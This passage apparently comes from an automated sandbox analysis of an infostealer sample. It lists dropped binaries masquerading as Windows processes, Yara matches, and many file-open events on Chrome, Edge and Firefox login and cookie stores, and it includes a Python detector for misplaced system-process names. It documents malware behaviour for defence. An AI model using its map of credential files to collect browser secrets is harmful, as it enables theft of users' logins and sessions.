Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_0101DF1E
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100B146 GetVersionExW, 0_2_0100B146
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000004.00000002.1932393224.0000000013164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: driverInto.exe PID: 5936, type: MEMORYSTR
Source: Yara match File source: 4.0.driverInto.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000000.1783939727.0000000000AC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1622104471.0000000006DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Windows Defender\services.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\portintosvc\driverInto.exe, type: DROPPED
Source: Yara match File source: C:\Windows\Registration\csrss.exe, type: DROPPED
Source: Yara match File source: 4.0.driverInto.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Windows Defender\services.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\portintosvc\driverInto.exe, type: DROPPED
Source: Yara match File source: C:\Windows\Registration\csrss.exe, type: DROPPED
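Two of the dropped files above carry the names of core Windows processes (services.exe under C:\Program Files (x86)\Windows Defender\ and csrss.exe under C:\Windows\Registration\) while the genuine svchost.exe in the volume-information block sits in C:\Windows\System32. The check below is an added example, not code from this report or from the sample; it implements the "system process name in an unexpected location" idea over the report's own Yara lines. The table of expected directories is a deliberately small, hand-written list; extend it for your environment.

```python
"""Added example: flag binaries that borrow a Windows system-process name but
live outside the directory Windows actually installs that process in."""
import re
from pathlib import PureWindowsPath

# Where Windows itself places each core process image (lower-cased; NTFS
# paths are case-insensitive). A file with one of these names anywhere else
# is masquerading, as the dropped services.exe and csrss.exe above do.
# Hand-written minimal table; extend it for your estate.
EXPECTED_DIRS = {
    "csrss.exe":    {r"c:\windows\system32"},
    "services.exe": {r"c:\windows\system32"},
    "smss.exe":     {r"c:\windows\system32"},
    "wininit.exe":  {r"c:\windows\system32"},
    "winlogon.exe": {r"c:\windows\system32"},
    "lsass.exe":    {r"c:\windows\system32"},
    "svchost.exe":  {r"c:\windows\system32", r"c:\windows\syswow64"},
    "explorer.exe": {r"c:\windows", r"c:\windows\syswow64"},
}

# Matches the report's "Source: Yara match File source: <path>, type: DROPPED" lines.
DROPPED_RE = re.compile(r"File source: (?P<path>.+?), type: DROPPED")


def is_masquerading(path: str) -> bool:
    """True when the file name is a system process name but the directory is not
    one Windows installs that process in."""
    p = PureWindowsPath(path)
    name = p.name.lower()
    if name not in EXPECTED_DIRS:
        return False                    # not a system process name; other checks apply
    parent = str(p.parent).lower()
    if parent.startswith("c:\\windows\\winsxs\\"):
        return False                    # the component store keeps staged copies of these
    return parent not in EXPECTED_DIRS[name]


def dropped_paths_from_report(lines):
    """Pull unique DROPPED file paths, in first-seen order, out of report lines."""
    found = [m.group("path") for m in map(DROPPED_RE.search, lines) if m]
    return list(dict.fromkeys(found))


def flag_dropped(paths):
    """Subset of paths that carry a system process name in the wrong place."""
    return [p for p in paths if is_masquerading(p)]


# Constructed input: the six DROPPED lines from this report's Yara match list, verbatim.
REPORT_LINES = [
    r"Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED",
    r"Source: Yara match File source: C:\Program Files (x86)\Windows Defender\services.exe, type: DROPPED",
    r"Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED",
    r"Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED",
    r"Source: Yara match File source: C:\portintosvc\driverInto.exe, type: DROPPED",
    r"Source: Yara match File source: C:\Windows\Registration\csrss.exe, type: DROPPED",
]

if __name__ == "__main__":
    for p in flag_dropped(dropped_paths_from_report(REPORT_LINES)):
        print("masquerading system binary:", p)
```

The check only catches the borrowed-name technique: driverInto.exe and XXPWErhsUbDrk.exe pass because they do not use a system name, so pair it with a suspicious-folder check (C:\portintosvc, C:\Users\Default\Pictures) for the rest of this sample's drops. The WinSxS exemption exists because the component store legitimately holds copies of these binaries; do not widen it to all of C:\Windows, or C:\Windows\Registration\csrss.exe slips through.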
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
